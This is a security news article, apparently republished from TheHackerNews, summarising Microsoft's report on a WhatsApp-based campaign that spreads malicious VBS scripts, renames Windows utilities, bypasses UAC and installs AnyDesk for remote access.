Microsoft has called attention to a new campaign that leverages WhatsApp messages to distribute malicious Visual Basic Script (VBS) files.
Notably, the activity began in late February 2026 and uses these scripts to initiate a multi-stage infection chain, establish persistence, and enable remote access. However, researchers still do not know what lures threat actors use to trick users into executing the scripts.
“The campaign relies on a combination of social engineering and living-off-the-land techniques,” the Microsoft Defender Security Research Team said. “It uses renamed Windows utilities to blend into normal system activity, retrieves payloads from trusted cloud services such as AWS, Tencent Cloud, and Backblaze B2, and installs malicious Microsoft Installer (MSI) packages to maintain control of the system.”
Attackers Blend Legitimate Tools with Malicious Activity
Furthermore, threat actors combine legitimate tools with trusted platforms, creating a particularly dangerous mix. As a result, they blend seamlessly into normal network activity and significantly increase the success rate of their attacks.
Specifically, the activity begins when attackers distribute malicious VBS files via WhatsApp messages. Once executed, these files create hidden folders in C:\ProgramData and drop renamed versions of legitimate Windows utilities such as “curl.exe” (renamed as “netapi.dll”) and “bitsadmin.exe” (renamed as “sc.exe”).
After gaining an initial foothold, attackers move quickly to establish persistence and escalate privileges, ultimately installing malicious MSI packages on victim systems. To achieve this, they download auxiliary VBS files hosted on AWS S3, Tencent Cloud, and Backblaze B2 using the renamed binaries.
“Once the secondary payloads are in place, the malware begins tampering with User Account Control (UAC) settings to weaken system defenses,” Redmond said. “It continuously attempts to launch cmd.exe with elevated privileges, retrying until UAC elevation succeeds or the process is forcibly terminated, modifying registry entries under HKLM\Software\Microsoft\Win, and embedding persistence mechanisms to ensure the infection survives system reboots.”
UAC Bypass and Remote Access Strengthen the Attack Chain
Consequently, these actions allow threat actors to gain elevated privileges without user interaction by combining Registry manipulation with UAC bypass techniques. In the final stage, they deploy unsigned MSI installers, including legitimate tools like AnyDesk, which provide Persistent remote access.
Through this access, Attackers can Exfiltrate data or deploy additional malware, further Compromising the system.
Ultimately, this campaign highlights a sophisticated approach that blends social engineering (WhatsApp delivery), stealth techniques (renamed legitimate tools and hidden attributes), and Cloud-based payload hosting.
“This campaign demonstrates a sophisticated infection chain combining social engineering (WhatsApp delivery), stealth techniques (renamed legitimate tools, hidden attributes), and cloud-based payload hosting,” Microsoft said.
Source: TheHackerNews
Read more at Impreza News
